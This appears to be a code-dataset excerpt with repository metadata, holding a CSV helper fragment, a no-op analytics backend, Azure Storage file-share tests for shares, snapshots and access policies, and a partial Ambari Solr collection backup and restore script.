Writes dictionary data to a target CSV file as row data using the csv.DictWriter().
The passed in fieldnames list is used by the DictWriter() to determine the order
in which each dictionary's key-value pairs are written to the row.
Parameters:
filepath (str): path to target file (if file does not exist it will be created)
data (list): dictionary content to be written to the target file
        fieldnames (seq): sequence specifying the order in which key-value pairs are written to each row
encoding (str): character encoding
Returns:
None
"""
with open(filepath, 'w', newline='', encoding=encoding) as file_obj:
writer = csv.DictWriter(file_obj, fieldnames=fieldnames)
writer.writeheader() # first row
writer.writerows(data)
# for row in data:
# writer.writerow(row)
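# Illustrative (added) round-trip sketch, not part of the original module;
# 'people.csv' and the field names are assumptions used only for this example.
if __name__ == '__main__':
    people = [
        {'name': 'Ada', 'year': '1815'},
        {'name': 'Alan', 'year': '1912'},
    ]
    write_dicts_to_csv('people.csv', people, fieldnames=['name', 'year'])
    rows = read_csv_into_dicts('people.csv')
    print(rows[0]['name'])  # Ada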
| 33.69 | 99 | 0.650045 |
bdcdff9f5a9cdcc85c1788a6c9d515b0884b470c
| 849 |
py
|
Python
|
analytics/backends/dummy.py
|
educreations/py-analytics
|
abbc814925c6cc200b3329c7de9f1868e1cb8c01
|
[
"Apache-2.0"
] | 10 |
2015-01-25T20:29:55.000Z
|
2020-12-08T21:35:09.000Z
|
analytics/backends/dummy.py
|
educreations/py-analytics
|
abbc814925c6cc200b3329c7de9f1868e1cb8c01
|
[
"Apache-2.0"
] | 3 |
2018-05-15T06:28:20.000Z
|
2021-03-30T17:47:45.000Z
|
analytics/backends/dummy.py
|
educreations/py-analytics
|
abbc814925c6cc200b3329c7de9f1868e1cb8c01
|
[
"Apache-2.0"
] | 6 |
2017-07-03T16:28:29.000Z
|
2020-06-15T19:10:45.000Z
|
from analytics.backends.base import BaseAnalyticsBackend
class Dummy(BaseAnalyticsBackend):
def track_count(self, unique_identifier, metric, inc_amt=1, **kwargs):
pass
def track_metric(self, unique_identifier, metric, date, inc_amt=1, **kwargs):
pass
def get_metric_by_day(self, unique_identifier, metric, from_date, limit=10, **kwargs):
pass
def get_metric_by_week(self, unique_identifier, metric, from_date, limit=10, **kwargs):
pass
def get_metric_by_month(self, unique_identifier, metric, from_date, limit=10, **kwargs):
pass
def get_metrics(self, metric_identifiers, from_date, limit=10, group_by="week", **kwargs):
pass
def get_count(self, unique_identifier, metric, **kwargs):
pass
def get_counts(self, metric_identifiers, **kwargs):
pass
| 32.653846 | 94 | 0.699647 |
ac47fe2fb325be700b323578c96d53f4a3b04649
| 32,608 |
py
|
Python
|
sdk/storage/azure-storage-file-share/tests/test_share.py
|
iscai-msft/azure-sdk-for-python
|
83715b95c41e519d5be7f1180195e2fba136fc0f
|
[
"MIT"
] | 1 |
2020-05-12T23:29:15.000Z
|
2020-05-12T23:29:15.000Z
|
sdk/storage/azure-storage-file-share/tests/test_share.py
|
iscai-msft/azure-sdk-for-python
|
83715b95c41e519d5be7f1180195e2fba136fc0f
|
[
"MIT"
] | 226 |
2019-07-24T07:57:21.000Z
|
2019-10-15T01:07:24.000Z
|
sdk/storage/azure-storage-file-share/tests/test_share.py
|
iscai-msft/azure-sdk-for-python
|
83715b95c41e519d5be7f1180195e2fba136fc0f
|
[
"MIT"
] | 1 |
2020-07-05T21:13:37.000Z
|
2020-07-05T21:13:37.000Z
|
# coding: utf-8
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import os
import unittest
from datetime import datetime, timedelta
import pytest
import requests
from azure.core.pipeline.transport import RequestsTransport
from azure.core.exceptions import (
HttpResponseError,
ResourceNotFoundError,
ResourceExistsError)
from azure.storage.fileshare import (
AccessPolicy,
ShareSasPermissions,
ShareServiceClient,
ShareDirectoryClient,
ShareFileClient,
ShareClient,
generate_share_sas)
from azure.storage.fileshare._generated.models import DeleteSnapshotsOptionType, ListSharesIncludeType
from devtools_testutils import ResourceGroupPreparer, StorageAccountPreparer
from _shared.testcase import (
StorageTestCase,
LogCaptured,
GlobalStorageAccountPreparer,
GlobalResourceGroupPreparer
)
# ------------------------------------------------------------------------------
TEST_SHARE_PREFIX = 'share'
# ------------------------------------------------------------------------------
class StorageShareTest(StorageTestCase):
def _setup(self, storage_account, storage_account_key):
file_url = self.account_url(storage_account, "file")
credentials = storage_account_key
self.fsc = ShareServiceClient(account_url=file_url, credential=credentials)
self.test_shares = []
def _teardown(self, FILE_PATH):
if os.path.isfile(FILE_PATH):
try:
os.remove(FILE_PATH)
except:
pass
# --Helpers-----------------------------------------------------------------
def _get_share_reference(self, prefix=TEST_SHARE_PREFIX):
share_name = self.get_resource_name(prefix)
share = self.fsc.get_share_client(share_name)
self.test_shares.append(share_name)
return share
def _create_share(self, prefix=TEST_SHARE_PREFIX):
share_client = self._get_share_reference(prefix)
share = share_client.create_share()
return share_client
def _delete_shares(self, prefix=TEST_SHARE_PREFIX):
for l in self.fsc.list_shares(include_snapshots=True):
try:
self.fsc.delete_share(l.name, delete_snapshots=True)
except:
pass
# --Test cases for shares -----------------------------------------
@GlobalStorageAccountPreparer()
def test_create_share(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share = self._get_share_reference()
# Act
created = self._create_share()
# Assert
self.assertTrue(created)
self._delete_shares(share.share_name)
@GlobalStorageAccountPreparer()
def test_create_share_snapshot(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share = self._get_share_reference()
# Act
created = share.create_share()
snapshot = share.create_snapshot()
# Assert
self.assertTrue(created)
self.assertIsNotNone(snapshot['snapshot'])
self.assertIsNotNone(snapshot['etag'])
self.assertIsNotNone(snapshot['last_modified'])
self._delete_shares(share.share_name)
@GlobalStorageAccountPreparer()
def test_create_snapshot_with_metadata(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share = self._get_share_reference()
metadata = {"test1": "foo", "test2": "bar"}
metadata2 = {"test100": "foo100", "test200": "bar200"}
# Act
created = share.create_share(metadata=metadata)
snapshot = share.create_snapshot(metadata=metadata2)
share_props = share.get_share_properties()
snapshot_client = ShareClient(
self.account_url(storage_account, "file"),
share_name=share.share_name,
snapshot=snapshot,
credential=storage_account_key
)
snapshot_props = snapshot_client.get_share_properties()
# Assert
self.assertTrue(created)
self.assertIsNotNone(snapshot['snapshot'])
self.assertIsNotNone(snapshot['etag'])
self.assertIsNotNone(snapshot['last_modified'])
self.assertEqual(share_props.metadata, metadata)
self.assertEqual(snapshot_props.metadata, metadata2)
self._delete_shares(share.share_name)
@GlobalStorageAccountPreparer()
def test_delete_share_with_snapshots(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share = self._get_share_reference()
share.create_share()
snapshot = share.create_snapshot()
# Act
with self.assertRaises(HttpResponseError):
share.delete_share()
deleted = share.delete_share(delete_snapshots=True)
self.assertIsNone(deleted)
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_delete_snapshot(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share = self._get_share_reference()
share.create_share()
snapshot = share.create_snapshot()
# Act
with self.assertRaises(HttpResponseError):
share.delete_share()
snapshot_client = ShareClient(
self.account_url(storage_account, "file"),
share_name=share.share_name,
snapshot=snapshot,
credential=storage_account_key
)
deleted = snapshot_client.delete_share()
self.assertIsNone(deleted)
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_create_share_fail_on_exist(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share = self._get_share_reference()
# Act
created = share.create_share()
# Assert
self.assertTrue(created)
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_create_share_with_already_existing_share_fail_on_exist(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share = self._get_share_reference()
# Act
created = share.create_share()
with self.assertRaises(HttpResponseError):
share.create_share()
# Assert
self.assertTrue(created)
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_create_share_with_metadata(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
metadata = {'hello': 'world', 'number': '42'}
# Act
client = self._get_share_reference()
created = client.create_share(metadata=metadata)
# Assert
self.assertTrue(created)
md = client.get_share_properties().metadata
self.assertDictEqual(md, metadata)
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_create_share_with_quota(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
# Act
client = self._get_share_reference()
created = client.create_share(quota=1)
# Assert
props = client.get_share_properties()
self.assertTrue(created)
self.assertEqual(props.quota, 1)
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_share_exists(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share = self._create_share()
# Act
exists = share.get_share_properties()
# Assert
self.assertTrue(exists)
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_share_not_exists(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share = self._get_share_reference()
# Act
with self.assertRaises(ResourceNotFoundError):
share.get_share_properties()
# Assert
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_share_snapshot_exists(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share = self._create_share()
snapshot = share.create_snapshot()
# Act
snapshot_client = self.fsc.get_share_client(share.share_name, snapshot=snapshot)
exists = snapshot_client.get_share_properties()
# Assert
self.assertTrue(exists)
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_share_snapshot_not_exists(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share = self._create_share()
made_up_snapshot = '2017-07-19T06:53:46.0000000Z'
# Act
snapshot_client = self.fsc.get_share_client(share.share_name, snapshot=made_up_snapshot)
with self.assertRaises(ResourceNotFoundError):
snapshot_client.get_share_properties()
# Assert
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_unicode_create_share_unicode_name(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share_name = u'啊齄丂狛狜'
# Act
with self.assertRaises(HttpResponseError):
# not supported - share name must be alphanumeric, lowercase
client = self.fsc.get_share_client(share_name)
client.create_share()
# Assert
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_list_shares_no_options(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share = self._create_share()
# Act
shares = list(self.fsc.list_shares())
# Assert
self.assertIsNotNone(shares)
self.assertGreaterEqual(len(shares), 1)
self.assertIsNotNone(shares[0])
self.assertNamedItemInContainer(shares, share.share_name)
self._delete_shares()
@GlobalResourceGroupPreparer()
@StorageAccountPreparer(random_name_enabled=True, sku='premium_LRS', name_prefix='pyacrstorage', kind='FileStorage')
def test_list_shares_no_options_for_premium_account(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share = self._create_share()
# Act
shares = list(self.fsc.list_shares())
# Assert
self.assertIsNotNone(shares)
self.assertGreaterEqual(len(shares), 1)
self.assertIsNotNone(shares[0])
self.assertIsNotNone(shares[0].provisioned_iops)
self.assertIsNotNone(shares[0].provisioned_ingress_mbps)
self.assertIsNotNone(shares[0].provisioned_egress_mbps)
self.assertIsNotNone(shares[0].next_allowed_quota_downgrade_time)
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_list_shares_with_snapshot(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
#share = self._get_share_reference()
share = self._create_share('random')
snapshot1 = share.create_snapshot()
snapshot2 = share.create_snapshot()
# Act
shares = self.fsc.list_shares(include_snapshots=True)
# Assert
self.assertIsNotNone(shares)
all_shares = list(shares)
self.assertEqual(len(all_shares), 3)
self.assertNamedItemInContainer(all_shares, share.share_name)
self.assertNamedItemInContainer(all_shares, snapshot1['snapshot'])
self.assertNamedItemInContainer(all_shares, snapshot2['snapshot'])
share.delete_share(delete_snapshots=True)
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_list_shares_with_prefix(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share = self._get_share_reference()
share.create_share()
# Act
shares = list(self.fsc.list_shares(name_starts_with=share.share_name))
# Assert
self.assertEqual(len(shares), 1)
self.assertIsNotNone(shares[0])
self.assertEqual(shares[0].name, share.share_name)
self.assertIsNone(shares[0].metadata)
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_list_shares_with_include_metadata(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
metadata = {'hello': 'world', 'number': '42'}
share = self._get_share_reference()
share.create_share(metadata=metadata)
# Act
shares = list(self.fsc.list_shares(share.share_name, include_metadata=True))
# Assert
self.assertIsNotNone(shares)
self.assertGreaterEqual(len(shares), 1)
self.assertIsNotNone(shares[0])
self.assertNamedItemInContainer(shares, share.share_name)
self.assertDictEqual(shares[0].metadata, metadata)
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_list_shares_with_num_results_and_marker(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
prefix = 'listshare'
share_names = []
for i in range(0, 4):
share_names.append(self._create_share(prefix + str(i)).share_name)
#share_names.sort()
# Act
generator1 = self.fsc.list_shares(prefix, results_per_page=2).by_page()
shares1 = list(next(generator1))
generator2 = self.fsc.list_shares(
prefix, results_per_page=2).by_page(continuation_token=generator1.continuation_token)
shares2 = list(next(generator2))
# Assert
self.assertIsNotNone(shares1)
self.assertEqual(len(shares1), 2)
self.assertNamedItemInContainer(shares1, share_names[0])
self.assertNamedItemInContainer(shares1, share_names[1])
self.assertIsNotNone(shares2)
self.assertEqual(len(shares2), 2)
self.assertNamedItemInContainer(shares2, share_names[2])
self.assertNamedItemInContainer(shares2, share_names[3])
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_set_share_metadata(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share = self._create_share()
metadata = {'hello': 'world', 'number': '42'}
# Act
share.set_share_metadata(metadata)
# Assert
md = share.get_share_properties().metadata
self.assertDictEqual(md, metadata)
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_get_share_metadata(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
metadata = {'hello': 'world', 'number': '42'}
# Act
client = self._get_share_reference()
created = client.create_share(metadata=metadata)
# Assert
self.assertTrue(created)
md = client.get_share_properties().metadata
self.assertDictEqual(md, metadata)
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_get_share_metadata_with_snapshot(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
metadata = {'hello': 'world', 'number': '42'}
# Act
client = self._get_share_reference()
created = client.create_share(metadata=metadata)
snapshot = client.create_snapshot()
snapshot_client = self.fsc.get_share_client(client.share_name, snapshot=snapshot)
# Assert
self.assertTrue(created)
md = snapshot_client.get_share_properties().metadata
self.assertDictEqual(md, metadata)
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_set_share_properties(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share = self._create_share()
share.set_share_quota(1)
# Act
props = share.get_share_properties()
# Assert
self.assertIsNotNone(props)
self.assertEqual(props.quota, 1)
self._delete_shares()
@GlobalResourceGroupPreparer()
@StorageAccountPreparer(random_name_enabled=True, sku='premium_LRS', name_prefix='pyacrstorage', kind='FileStorage')
def test_get_share_properties_for_premium_account(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share = self._create_share()
# Act
props = share.get_share_properties()
# Assert
self.assertIsNotNone(props)
self.assertIsNotNone(props.quota)
self.assertIsNotNone(props.provisioned_iops)
self.assertIsNotNone(props.provisioned_ingress_mbps)
self.assertIsNotNone(props.provisioned_egress_mbps)
self.assertIsNotNone(props.next_allowed_quota_downgrade_time)
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_delete_share_with_existing_share(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share = self._get_share_reference()
share.create_share()
# Act
deleted = share.delete_share()
# Assert
self.assertIsNone(deleted)
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_delete_share_with_existing_share_fail_not_exist(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
client = self._get_share_reference()
# Act
with LogCaptured(self) as log_captured:
with self.assertRaises(HttpResponseError):
client.delete_share()
log_as_str = log_captured.getvalue()
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_delete_share_with_non_existing_share(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
client = self._get_share_reference()
# Act
with LogCaptured(self) as log_captured:
with self.assertRaises(HttpResponseError):
deleted = client.delete_share()
log_as_str = log_captured.getvalue()
self.assertTrue('ERROR' not in log_as_str)
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_delete_share_with_non_existing_share_fail_not_exist(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
client = self._get_share_reference()
# Act
with LogCaptured(self) as log_captured:
with self.assertRaises(HttpResponseError):
client.delete_share()
log_as_str = log_captured.getvalue()
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_get_share_stats(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share = self._get_share_reference()
share.create_share()
# Act
share_usage = share.get_share_stats()
# Assert
self.assertEqual(share_usage, 0)
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_set_share_acl(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share = self._get_share_reference()
share.create_share()
# Act
resp = share.set_share_access_policy(signed_identifiers=dict())
# Assert
acl = share.get_share_access_policy()
self.assertIsNotNone(acl)
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_set_share_acl_with_empty_signed_identifiers(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share = self._get_share_reference()
share.create_share()
# Act
resp = share.set_share_access_policy(dict())
# Assert
acl = share.get_share_access_policy()
self.assertIsNotNone(acl)
self.assertEqual(len(acl.get('signed_identifiers')), 0)
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_set_share_acl_with_signed_identifiers(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share = self._get_share_reference()
share.create_share()
# Act
identifiers = dict()
identifiers['testid'] = AccessPolicy(
permission=ShareSasPermissions(write=True),
expiry=datetime.utcnow() + timedelta(hours=1),
start=datetime.utcnow() - timedelta(minutes=1),
)
resp = share.set_share_access_policy(identifiers)
# Assert
acl = share.get_share_access_policy()
self.assertIsNotNone(acl)
self.assertEqual(len(acl['signed_identifiers']), 1)
self.assertEqual(acl['signed_identifiers'][0].id, 'testid')
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_set_share_acl_too_many_ids(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share = self._get_share_reference()
share.create_share()
# Act
identifiers = dict()
for i in range(0, 6):
identifiers['id{}'.format(i)] = AccessPolicy()
# Assert
with self.assertRaises(ValueError) as e:
share.set_share_access_policy(identifiers)
self.assertEqual(
str(e.exception),
'Too many access policies provided. The server does not support setting more than 5 access policies on a single resource.'
)
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_list_directories_and_files(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share = self._create_share()
dir0 = share.get_directory_client()
dir0.upload_file('file1', 'data1')
dir1 = share.get_directory_client('dir1')
dir1.create_directory()
dir1.upload_file('file2', 'data2')
dir2 = share.get_directory_client('dir2')
dir2.create_directory()
# Act
resp = list(share.list_directories_and_files())
# Assert
self.assertIsNotNone(resp)
self.assertEqual(len(resp), 3)
self.assertIsNotNone(resp[0])
self.assertNamedItemInContainer(resp, 'dir1')
self.assertNamedItemInContainer(resp, 'dir2')
self.assertNamedItemInContainer(resp, 'file1')
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_list_directories_and_files_with_snapshot(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share_name = self._create_share()
dir1 = share_name.get_directory_client('dir1')
dir1.create_directory()
dir2 = share_name.get_directory_client('dir2')
dir2.create_directory()
snapshot1 = share_name.create_snapshot()
dir3 = share_name.get_directory_client('dir3')
dir3.create_directory()
file1 = share_name.get_file_client('file1')
file1.upload_file('data')
# Act
snapshot_client = self.fsc.get_share_client(share_name.share_name, snapshot=snapshot1)
resp = list(snapshot_client.list_directories_and_files())
# Assert
self.assertIsNotNone(resp)
self.assertEqual(len(resp), 2)
self.assertIsNotNone(resp[0])
self.assertNamedItemInContainer(resp, 'dir1')
self.assertNamedItemInContainer(resp, 'dir2')
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_list_directories_and_files_with_num_results(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share_name = self._create_share()
dir1 = share_name.create_directory('dir1')
root = share_name.get_directory_client()
root.upload_file('filea1', '1024')
root.upload_file('filea2', '1024')
root.upload_file('filea3', '1024')
root.upload_file('fileb1', '1024')
# Act
result = share_name.list_directories_and_files(results_per_page=2).by_page()
result = list(next(result))
# Assert
self.assertIsNotNone(result)
self.assertEqual(len(result), 2)
self.assertNamedItemInContainer(result, 'dir1')
self.assertNamedItemInContainer(result, 'filea1')
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_list_directories_and_files_with_num_results_and_marker(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share_name = self._create_share()
dir1 = share_name.get_directory_client('dir1')
dir1.create_directory()
dir1.upload_file('filea1', '1024')
dir1.upload_file('filea2', '1024')
dir1.upload_file('filea3', '1024')
dir1.upload_file('fileb1', '1024')
# Act
generator1 = share_name.list_directories_and_files(
'dir1', results_per_page=2).by_page()
result1 = list(next(generator1))
generator2 = share_name.list_directories_and_files(
'dir1', results_per_page=2).by_page(continuation_token=generator1.continuation_token)
result2 = list(next(generator2))
# Assert
self.assertEqual(len(result1), 2)
self.assertEqual(len(result2), 2)
self.assertNamedItemInContainer(result1, 'filea1')
self.assertNamedItemInContainer(result1, 'filea2')
self.assertNamedItemInContainer(result2, 'filea3')
self.assertNamedItemInContainer(result2, 'fileb1')
self.assertEqual(generator2.continuation_token, None)
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_list_directories_and_files_with_prefix(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share = self._create_share()
dir1 = share.create_directory('dir1')
share.create_directory('dir1/pref_dir3')
share.create_directory('dir2')
root = share.get_directory_client()
root.upload_file('file1', '1024')
dir1.upload_file('pref_file2', '1025')
dir1.upload_file('file3', '1025')
# Act
resp = list(share.list_directories_and_files('dir1', name_starts_with='pref'))
# Assert
self.assertIsNotNone(resp)
self.assertEqual(len(resp), 2)
self.assertIsNotNone(resp[0])
self.assertNamedItemInContainer(resp, 'pref_file2')
self.assertNamedItemInContainer(resp, 'pref_dir3')
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_shared_access_share(self, resource_group, location, storage_account, storage_account_key):
# SAS URL is calculated from storage key, so this test runs live only
if not self.is_live:
return
self._setup(storage_account, storage_account_key)
file_name = 'file1'
dir_name = 'dir1'
data = b'hello world'
share = self._create_share()
dir1 = share.create_directory(dir_name)
dir1.upload_file(file_name, data)
token = generate_share_sas(
share.account_name,
share.share_name,
share.credential.account_key,
expiry=datetime.utcnow() + timedelta(hours=1),
permission=ShareSasPermissions(read=True),
)
sas_client = ShareFileClient(
self.account_url(storage_account, "file"),
share_name=share.share_name,
file_path=dir_name + '/' + file_name,
credential=token,
)
# Act
print(sas_client.url)
response = requests.get(sas_client.url)
# Assert
self.assertTrue(response.ok)
self.assertEqual(data, response.content)
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_create_permission_for_share(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
user_given_permission = "O:S-1-5-21-2127521184-1604012920-1887927527-21560751G:S-1-5-21-2127521184-" \
"1604012920-1887927527-513D:AI(A;;FA;;;SY)(A;;FA;;;BA)(A;;0x1200a9;;;" \
"S-1-5-21-397955417-626881126-188441444-3053964)"
share_client = self._create_share()
permission_key = share_client.create_permission_for_share(user_given_permission)
self.assertIsNotNone(permission_key)
server_returned_permission = share_client.get_permission_for_share(permission_key)
self.assertIsNotNone(server_returned_permission)
permission_key2 = share_client.create_permission_for_share(server_returned_permission)
# the permission key obtained from user_given_permission should be the same as the permission key obtained from
# server returned permission
self.assertEqual(permission_key, permission_key2)
@GlobalStorageAccountPreparer()
def test_transport_closed_only_once(self, resource_group, location, storage_account, storage_account_key):
if not self.is_live:
return
self._setup(storage_account, storage_account_key)
transport = RequestsTransport()
url = self.account_url(storage_account, "file")
credential = storage_account_key
prefix = TEST_SHARE_PREFIX
share_name = self.get_resource_name(prefix)
with ShareServiceClient(url, credential=credential, transport=transport) as fsc:
fsc.get_service_properties()
assert transport.session is not None
with fsc.get_share_client(share_name) as fc:
assert transport.session is not None
fsc.get_service_properties()
assert transport.session is not None
@GlobalStorageAccountPreparer()
def test_delete_directory_from_share(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share = self._create_share()
dir1 = share.create_directory('dir1')
share.create_directory('dir2')
share.create_directory('dir3')
# Act
resp = list(share.list_directories_and_files())
self.assertEqual(len(resp), 3)
share.delete_directory('dir3')
# Assert
resp = list(share.list_directories_and_files())
self.assertEqual(len(resp), 2)
self._delete_shares()
# ------------------------------------------------------------------------------
if __name__ == '__main__':
unittest.main()
| 38.45283 | 138 | 0.679281 |
7abb3e22f902576952adf7712a0f6b66a2b5a84c
| 15,089 |
py
|
Python
|
stacks/XIAOMATECH/1.0/services/AMBARI_INFRA_SOLR/package/scripts/collection.py
|
tvorogme/dataops
|
acfa21df42a20768c004c6630a064f4e38e280b2
|
[
"Apache-2.0"
] | 3 |
2019-08-13T01:44:16.000Z
|
2019-12-10T04:05:56.000Z
|
stacks/XIAOMATECH/1.0/services/AMBARI_INFRA_SOLR/package/scripts/collection.py
|
tvorogme/dataops
|
acfa21df42a20768c004c6630a064f4e38e280b2
|
[
"Apache-2.0"
] | null | null | null |
stacks/XIAOMATECH/1.0/services/AMBARI_INFRA_SOLR/package/scripts/collection.py
|
tvorogme/dataops
|
acfa21df42a20768c004c6630a064f4e38e280b2
|
[
"Apache-2.0"
] | 7 |
2019-05-29T17:35:25.000Z
|
2021-12-04T07:55:10.000Z
|
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import time
from resource_management.core.logger import Logger
from resource_management.core.resources.system import Directory, Execute, File
from resource_management.libraries.functions.format import format
from resource_management.libraries.functions import solr_cloud_util
from resource_management.libraries.resources.properties_file import PropertiesFile
def backup_collection(env):
"""
    Back up collections using the replication API (the Solr Cloud Backup API is not available in Solr 5).
    If the cluster is not kerberized, IP addresses need to be resolved to hostnames (as SOLR_HOST=`hostname -f` is not used by default in infra-solr-env).
"""
import params, command_commons
env.set_params(command_commons)
Directory(
command_commons.index_location,
mode=0755,
cd_access='a',
create_parents=True,
owner=params.infra_solr_user,
group=params.user_group)
Logger.info(
format("Backup Solr Collection {collection} to {index_location}"))
host_core_map = command_commons.solr_backup_host_cores_map
host_or_ip = params.hostname
    # Resolve IP addresses to hostnames for an unsecured cluster
host_ip_pairs = {}
if not params.security_enabled:
keys = host_core_map.keys()
for key in keys:
if command_commons.is_ip(key):
resolved_hostname = command_commons.resolve_ip_to_hostname(key)
host_ip_pairs[resolved_hostname] = key
if params.hostname in host_ip_pairs:
host_or_ip = host_ip_pairs[params.hostname]
cores = host_core_map[host_or_ip] if host_or_ip in host_core_map else []
for core in cores:
if core in command_commons.skip_cores:
Logger.info(format("Core '{core}' is filtered out."))
continue
solr_request_path = format(
"{core}/replication?command=BACKUP&location={index_location}&name={core}&wt=json"
)
backup_api_cmd = command_commons.create_solr_api_request_command(
solr_request_path)
Execute(backup_api_cmd, user=params.infra_solr_user, logoutput=True)
if command_commons.request_async is False:
Logger.info(
"Sleep 5 seconds to wait until the backup request is executed."
)
time.sleep(5)
Logger.info("Check backup status ...")
solr_status_request_path = format(
"{core}/replication?command=details&wt=json")
status_check_json_output = format(
"{index_location}/backup_status.json")
status_check_cmd = command_commons.create_solr_api_request_command(
solr_status_request_path, status_check_json_output)
command_commons.snapshot_status_check(
status_check_cmd,
status_check_json_output,
core,
True,
log_output=command_commons.log_output,
tries=command_commons.request_tries,
time_interval=command_commons.request_time_interval)
snapshot_folder = format("{index_location}/snapshot.{core}")
if command_commons.check_folder_exists(snapshot_folder):
command_commons.check_folder_until_size_not_changes(
snapshot_folder)
def restore_collection(env):
"""
    Restore collections by copying snapshots into core folders with a backup_* prefix, then removing the old cores and stripping the backup_* prefixes from the folder names.
"""
import params, command_commons
env.set_params(command_commons)
if command_commons.solr_num_shards == 0:
raise Exception(
format("The 'solr_shards' command parameter is required to set."))
if not command_commons.solr_restore_config_set:
raise Exception(
format(
"The 'solr_restore_config_set' command parameter is required to set."
))
Logger.info("Original core / host map: " +
str(command_commons.solr_backup_core_host_map))
Logger.info("New core / host map: " +
str(command_commons.solr_restore_core_host_map))
original_core_host_pairs = command_commons.sort_core_host_pairs(
command_commons.solr_backup_core_host_map)
new_core_host_pairs = command_commons.sort_core_host_pairs(
command_commons.solr_restore_core_host_map)
